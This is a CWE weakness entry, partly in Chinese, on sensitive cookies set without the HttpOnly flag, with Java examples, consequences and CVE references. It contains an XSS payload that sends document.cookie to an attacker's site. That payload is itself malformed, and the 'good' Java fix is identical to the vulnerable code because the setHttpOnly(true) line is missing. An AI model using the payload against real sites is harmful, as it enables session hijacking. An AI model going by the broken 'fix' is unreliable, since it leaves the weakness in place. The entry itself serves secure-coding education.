CWE-1004 没有'HttpOnly'标志的敏感Cookie

结构: Simple

Abstraction: Variant

状态: Incomplete

被利用可能性: Medium


The software uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.


The HttpOnly flag directs compatible browsers to prevent client-side script from accessing cookies. Including the HttpOnly flag in the Set-Cookie HTTP response header helps mitigate the risk associated with Cross-Site Scripting (XSS) where an attacker's script code might attempt to read the contents of a cookie and exfiltrate information obtained. When set, browsers that support the flag will not reveal the contents of the cookie to a third party via client-side script executed via XSS.


  • cwe_Nature: ChildOf cwe_CWE_ID: 732 cwe_View_ID: 1000 cwe_Ordinal: Primary


范围 影响 注释
Confidentiality Read Application Data If the HttpOnly flag is not set, then sensitive information stored in the cookie may be exposed to unintended parties.
Integrity Gain Privileges or Assume Identity If the cookie in question is an authentication cookie, then not setting the HttpOnly flag may allow an adversary to steal authentication data (e.g., a session ID) and assume the identity of the user.




Leverage the HttpOnly flag when setting a sensitive cookie in a response.


In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.

The snippet of code below establishes a new cookie to hold the sessionID.

bad Java

String sessionID = generateSessionId();
Cookie c = new Cookie("session_id", sessionID);

The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as:

attack JavaScript

document.write('<img src="' + document.cookie . '">'

When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie.

To mitigate the risk, use the setHttpOnly(true) method.

good Java

String sessionID = generateSessionId();
Cookie c = new Cookie("session_id", sessionID);


标识 说明 链接
CVE-2014-3852 CMS written in Python does not include the HTTPOnly flag in a Set-Cookie header, allowing remote attackers to obtain potentially sensitive information via script access to this cookie.
CVE-2015-4138 Appliance for managing encrypted communications does not use HttpOnly flag.